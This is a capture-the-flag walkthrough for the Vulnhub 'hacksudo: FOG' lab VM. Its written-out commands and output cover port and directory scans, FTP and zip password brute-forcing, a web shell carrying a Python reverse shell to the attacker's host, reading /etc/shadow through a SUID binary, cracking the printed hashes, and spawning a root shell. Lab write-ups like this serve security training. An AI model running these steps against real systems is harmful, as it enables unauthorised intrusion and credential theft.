Vulnhub hacksudo: FOG Walkthrough
https://www.vulnhub.com/entry/hacksudo-fog,697/
Scan open ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
PORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
443/tcp open ssl/https Apache/2.4.38 (Debian)
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
...
43195/tcp open mountd 1-3 (RPC #100005)
45469/tcp open nlockmgr 1-4 (RPC #100021)
48871/tcp open mountd 1-3 (RPC #100005)
52195/tcp open mountd 1-3 (RPC #100005)Scan folders/files of port 80, download dict.txt.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index.html (Status: 200) [Size: 853]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]
Found username hacksudo at cms page.
[image-20210518224756405.png]
Bruteforce ftp.
hydra -l hacksudo -P dict.txt -t 32 192.168.56.100 ftp -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
[DATA] attacking ftp://192.168.56.100:21/
[21][ftp] host: 192.168.56.100 login: hacksudo password: hackme
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password foundDownload secr3tSteg.zip.
ftp> ls -la
200 PORT command successful
150 Connecting to port 43827
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 33 33 389 May 7 03:34 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 13:57 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -la
200 PORT command successful
150 Connecting to port 46515
drwxr-xr-x 2 0 0 4096 May 6 13:57 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 0 0 63 May 5 11:07 authors.txt
-rw-r--r-- 1 0 0 0 May 6 11:36 installfog
-rw-r--r-- 1 0 0 1573833 May 6 19:24 secr3tSteg.zipBruteforce password of zip.
fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip
PASSWORD FOUND!!!!: pw == fooledDownload the SoundStegno provided at source code of index1.html.
[image-20210519103824772.png]
Decrypt the wav file unzipped from secr3tSteg.zip, get hints.
python3 /opt/SoundStegno/ExWave.py -f ./hacksudoSTEGNO.wav
...
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVURDecrypt Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.
[image-20210518224455131.png]
Login cms with hacksudo:hacksudoISRO. Found cmsmsrce.txt.
[image-20210518224924381.png]
Check content of the txt file.
[image-20210519104218050.png]
Copy cmsmsrce.txt to shell.php, visit the following address in browser.
http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27At the same time, listen at port 1234 in another terminal, get reverse shell.
[image-20210519104609411.png]
Find suid files.
find / -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwdUse look to read /etc/shadow.
www-data@hacksudo:/home$ look '' /etc/shadow
look '' /etc/shadow
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
...
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
dnsmasq:*:18756:0:99999:7:::Crack password of isro.
john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt fish-0 | 0 [23:32:44]
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty (isro)Log in ssh as user isro. Check sudo, but it's rabbit hole.
ssh isro@192.168.56.100
isro@192.168.56.100's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
isro@hacksudo:~$ sudo -l
[sudo] password for isro:
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$In /home/isro/fog, found a executable file of user root.
isro@hacksudo:~$ ls -la
total 40
drwxr-x--- 5 isro isro 4096 May 18 12:16 .
drwxr-xr-x 6 root root 4096 May 8 12:25 ..
-rw------- 1 root isro 41 May 18 11:44 .bash_history
-rw-r--r-- 1 isro isro 0 May 5 14:05 .bash_logout
-rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
drwx------ 3 isro isro 4096 May 5 14:09 .gnupg
drwxr-xr-x 3 isro isro 4096 May 5 14:11 .local
-rw-r--r-- 1 isro isro 0 May 5 14:05 .profile
-r-------- 1 isro isro 33 May 6 14:31 user.txt
-rw------- 1 isro isro 54 May 18 12:16 .Xauthority
isro@hacksudo:~$ cd fog
isro@hacksudo:~/fog$ ls -la
total 3700
drwxr-xr-x 2 isro isro 4096 May 13 05:06 .
drwxr-x--- 5 isro isro 4096 May 18 12:16 ..
-rwxr-xr-x 1 root isro 16712 May 12 13:46 fog
-rw-r--r-- 1 isro isro 0 May 6 14:30 get
-rwxr-xr-x 1 isro isro 69368 May 6 14:29 ping
-rwxr-xr-x 1 isro isro 3689352 May 6 14:30 pythonRun fog, get python shell, check id, it's root.
isro@hacksudo:~/fog$ ./fog
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os;os.system("id");
uid=0(root) gid=1003(isro) groups=1003(isro)
0Spawn a root shell.
>>> import pty;pty.spawn("/bin/bash");
┌──(root💀hacksudo)-[~/fog]
└─# id;hostname
uid=0(root) gid=1003(isro) groups=1003(isro)
hacksudo
┌──(root💀hacksudo)-[~/fog]
└─# c
bash: c: command not found
┌──(root💀hacksudo)-[~/fog]
└─#
┌──(root💀hacksudo)-[~/fog]
└─#